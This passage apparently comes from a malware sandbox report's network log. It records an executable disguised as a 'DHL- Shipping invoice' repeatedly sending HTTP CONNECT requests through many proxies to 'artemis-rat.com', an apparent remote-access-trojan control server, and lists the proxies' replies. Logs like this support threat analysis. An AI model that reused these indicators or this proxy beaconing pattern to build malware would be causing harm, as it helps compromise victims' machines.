                            1300192.168.2.45381358.246.58.15090026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.668487072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.972320080 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1301192.168.2.452191161.97.163.52301896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.673261881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.750157118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.750583887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.843859911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.952914953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.952907085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:40.956968069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1302192.168.2.45380043.159.35.152126756484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.673891068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.046384096 CET174INHTTP/1.1 403 Forbidden Content-Type: text/plain; charset=utf-8Proxy-Authenticate: Basic realm="proxy"errorMsg: user forbidden,userip=191.96.150.227,info=insufficient flo
                            Data Raw:
                            Data Ascii:


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1303192.168.2.453996104.23.107.172806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.674428940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.761925936 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1304192.168.2.453994165.227.196.37567556484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.674563885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.062566042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.562653065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250406981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1305192.168.2.453952157.185.157.151265896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.676100969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1306192.168.2.45377558.253.210.12288886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.676500082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1307192.168.2.45205591.134.140.160119466484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.733388901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.750073910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.750554085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.843852997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.952924967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.953011036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.952941895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1308192.168.2.454033162.159.242.62806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.733478069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.821173906 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1309192.168.2.45384647.93.121.200806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.733747005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.036461115 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                            Mar 12, 2024 08:37:05.038463116 CET172INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.4.4</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1310192.168.2.452102206.189.145.23496146484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.733911991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.765754938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.866071939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1311192.168.2.45390113.234.24.11610806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.733911991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.008197069 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1312192.168.2.45394637.1.199.18806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.735713959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1313192.168.2.453831114.55.84.12300016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.736941099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.056788921 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1314192.168.2.454072172.67.219.60806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.738517046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.826051950 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1315192.168.2.45394365.21.24.81806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.738687992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1316192.168.2.453849115.146.225.137100466484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.738749981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1317192.168.2.45329750.63.12.101617976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.738779068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.750128984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.750551939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.843890905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.952954054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.953011036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
